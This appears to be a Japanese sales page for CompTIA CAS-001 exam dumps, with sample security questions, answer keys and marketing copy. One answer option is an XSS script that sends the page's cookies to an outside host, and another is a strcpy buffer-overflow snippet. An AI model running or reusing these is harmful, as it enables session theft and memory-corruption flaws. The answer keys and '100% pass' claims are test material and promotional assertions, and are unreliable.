CAS-001の無料問題集（495題）、CAS-001認定試験参考書

CompTIA CAS-001 問題集

試験コード：CAS-001

試験名称：CompTIA Advanced Security Practitioner

最近更新時間：2024-04-26

問題と解答：全495問

CAS-001 無料でデモをダウンロード：

PDF版 Demo ソフト版 Demo オンライン版 Demo

無料問題集CAS-001 資格取得

質問 1：
The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing, system log gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendor responses to the RFQ. Which of the following questions is the MOST important?
A. What encryption standards are used in remote desktop and file transfer functionality?
B. What are the protections against MITM?
C. What encryption standards are used in tracking database?
D. What accountability is built into the remote support application?
E. What snapshot or "undo" features are present in the application?
正解：D

質問 2：
If a technician must take an employee's workstation into custody in response to an
investigation, which of the following can BEST reduce the likelihood of related legal issues?
A. A screen displayed at log in that informs users of the employer's rights to seize, search, and monitor company devices.
B. A printout of an activity log, showing that the employee has been spending substantial time on non-work related websites.
C. A formal training and awareness program on information security for all company managers.
D. A formal letter from the company's president approving the seizure of the workstation.
正解：A

質問 3：
The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions to be
outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are not implemented?
A. Cultural differences, increased cost of doing business and divestiture issues
B. Improper handling of client data, interoperability agreement issues and regulatory issues
C. Geographical regulation issues, loss of intellectual property and interoperability agreement issues
D. Improper handling of customer data, loss of intellectual property and reputation damage
正解：D

質問 4：
A corporation has Research and Development (R&D) and IT support teams, each requiring separate networks with independent control of their security boundaries to support department objectives. The corporation's Information Security Officer (ISO) is responsible for providing firewall services to both departments, but does not want to increase the hardware footprint within the datacenter. Which of the following should the ISO consider to provide the independent functionality required by each department's IT teams?
A. Provide each department with a virtual firewall and assign administrative control to the physical firewall.
B. Put both departments behind the firewall and assign administrative control for each department to the corporate firewall.
C. Put both departments behind the firewall and incorporate restrictive controls on each department's network.
D. Provide each department with a virtual firewall and assign appropriate levels of management for the virtual device.
正解：D

質問 5：
An IT administrator has been tasked by the Chief Executive Officer with implementing security using a single device based on the following requirements:
1.Selective sandboxing of suspicious code to determine malicious intent.
2.VoIP handling for SIP and H.323 connections.
3.Block potentially unwanted applications.
Which of the following devices would BEST meet all of these requirements?
A. UTM
B. HIDS
C. WAF
D. NIDS
E. HSM
正解：A

質問 6：
The Chief Information Officer (CIO) of Company XYZ has returned from a large IT conference where one of the topics was defending against zero day attacks - specifically deploying third party patches to vulnerable software. Two months prior, the majority of the company systems were compromised because of a zero day exploit. Due to budget constraints the company only has operational systems. The CIO wants the Security Manager to research the use of these patches. Which of the following is the GREATEST concern with the use of a third party patch to mitigate another un-patched vulnerability?
A. Another period of vulnerability will be introduced because of the need to remove the third party patch prior to installing any vendor patch.
B. The company's patch management solution only supports patches and updates released directly by the vendor.
C. The company does not have an adequate test environment to validate the impact of the third party patch, introducing unknown risks.
D. The third party patch may introduce additional unforeseen risks and void the software licenses for the patched applications.
正解：C

質問 7：
A system designer needs to factor in CIA requirements for a new SAN. Which of the CIA requirements is BEST met by multipathing?
A. Integrity
B. Availability
C. Confidentiality
D. Authentication
正解：B

質問 8：
Driven mainly by cost, many companies outsource computing jobs which require a large amount of processor cycles over a short duration to cloud providers. This allows the company to avoid a large investment in computing resources which will only be used for a short time.
Assuming the provisioned resources are dedicated to a single company, which of the following is the MAIN vulnerability associated with on-demand provisioning?
A. Failure of the de-provisioning mechanism resulting in excessive charges for the resources
B. Traces of proprietary data which can remain on the virtual machine and be exploited
C. Exposure of proprietary data when in-transit to the cloud provider through IPSec tunnels
D. Remnants of network data from prior customers on the physical servers during a compute job
正解：B

安全的な支払方式を利用しています

Credit Cardは今まで全世界の一番安全の支払方式です。少数の手続きの費用かかる必要がありますとはいえ、保障があります。お客様の利益を保障するために、弊社のCAS-001問題集は全部Credit Cardで支払われることができます。

領収書について：社名入りの領収書が必要な場合、メールで社名に記入していただき送信してください。弊社はPDF版の領収書を提供いたします。

弊社は失敗したら全額で返金することを承諾します

我々は弊社のCAS-001問題集に自信を持っていますから、試験に失敗したら返金する承諾をします。我々のCompTIA CAS-001を利用して君は試験に合格できると信じています。もし試験に失敗したら、我々は君の支払ったお金を君に全額で返して、君の試験の失敗する経済損失を減少します。

一年間の無料更新サービスを提供します

君が弊社のCompTIA CAS-001をご購入になってから、我々の承諾する一年間の更新サービスが無料で得られています。弊社の専門家たちは毎日更新状態を検査していますから、この一年間、更新されたら、弊社は更新されたCompTIA CAS-001をお客様のメールアドレスにお送りいたします。だから、お客様はいつもタイムリーに更新の通知を受けることができます。我々は購入した一年間でお客様がずっと最新版のCompTIA CAS-001を持っていることを保証します。

弊社のCompTIA CAS-001を利用すれば試験に合格できます

弊社のCompTIA CAS-001は専門家たちが長年の経験を通して最新のシラバスに従って研究し出した勉強資料です。弊社はCAS-001問題集の質問と答えが間違いないのを保証いたします。

この問題集は過去のデータから分析して作成されて、カバー率が高くて、受験者としてのあなたを助けて時間とお金を節約して試験に合格する通過率を高めます。我々の問題集は的中率が高くて、100％の合格率を保証します。我々の高質量のCompTIA CAS-001を利用すれば、君は一回で試験に合格できます。

弊社は無料CompTIA CAS-001サンプルを提供します

お客様は問題集を購入する時、問題集の質量を心配するかもしれませんが、我々はこのことを解決するために、お客様に無料CAS-001サンプルを提供いたします。そうすると、お客様は購入する前にサンプルをダウンロードしてやってみることができます。君はこのCAS-001問題集は自分に適するかどうか判断して購入を決めることができます。

CAS-001試験ツール：あなたの訓練に便利をもたらすために、あなたは自分のペースによって複数のパソコンで設置できます。

TopExamは君にCAS-001の問題集を提供して、あなたの試験への復習にヘルプを提供して、君に難しい専門知識を楽に勉強させます。TopExamは君の試験への合格を期待しています。

CompTIA Advanced Security Practitioner 認定 CAS-001 試験問題:

1. Wireless users are reporting issues with the company's video conferencing and VoIP systems. The security administrator notices DOS attacks on the network that are affecting the company's VoIP system (i.e. premature call drops and garbled call signals). The security administrator also notices that the SIP servers are unavailable during these attacks. Which of the following security controls will MOST likely mitigate the VoIP DOS attacks on the network? (Select TWO).

A) Update the firewall managing the SIP servers
B) Update the HIDS managing the SIP servers
C) Configure 802.11e on the network
D) Configure 802.11b on the network
E) Configure 802.1q on the network

2. Virtual hosts with different security requirements should be:

A) scanned for vulnerabilities regularly.
B) encrypted with a one-time password.
C) moved to the cloud.
D) stored on separate physical hosts.

3. An administrator is troubleshooting availability issues on a FCoE based storage array that uses deduplication. An administrator has access to the raw data from the SAN and wants to restore the data to different hardware. Which of the following issues may potentially occur?

A) The data may not be in a usable format.
B) The existing SAN may be read-only.
C) The existing SAN used LUN masking.
D) The new SAN is not FCoE based.

4. Which of the following displays an example of a buffer overflow attack?

A) <form action="/cgi-bin/login" method=post>
Username: <input type=text name=username>
PassworD.<input type=password name=password>
<input type=submit value=Login>
B) #include
char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes
void main()
{char buf[8];
strcpy(buf, code);
}
C) <SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>
D) Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-
1.dsc
e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz
d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz
ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb
7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb
b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb

5. Unit testing for security functionality and resiliency to attack, as well as developing secure code and exploit mitigation, occur in which of the following phases of the Secure Software Development Lifecycle?

A) Secure Software Requirements
B) Secure Software Implementation
C) Software Acceptance
D) Secure Software Design

質問と回答：

質問 # 1
正解： A、C

質問 # 2
正解： D

質問 # 3
正解： A

質問 # 4
正解： B

質問 # 5
正解： B